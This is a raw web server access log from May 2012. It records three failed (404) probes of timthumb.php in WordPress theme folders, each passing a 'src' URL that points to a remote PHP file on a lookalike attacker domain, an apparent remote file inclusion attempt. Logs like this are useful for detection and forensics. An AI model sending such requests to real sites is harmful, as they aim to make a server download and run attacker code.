31.7.34.14 - - [14/May/2012:02:11:14 +0200] "GET //wp-content/themes/coverht-wp/scripts/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:02:11:42 +0200] "GET /stats//wp-content/themes/ecobiz/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:02:11:42 +0200] "GET //wp-content/themes/ecobiz/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
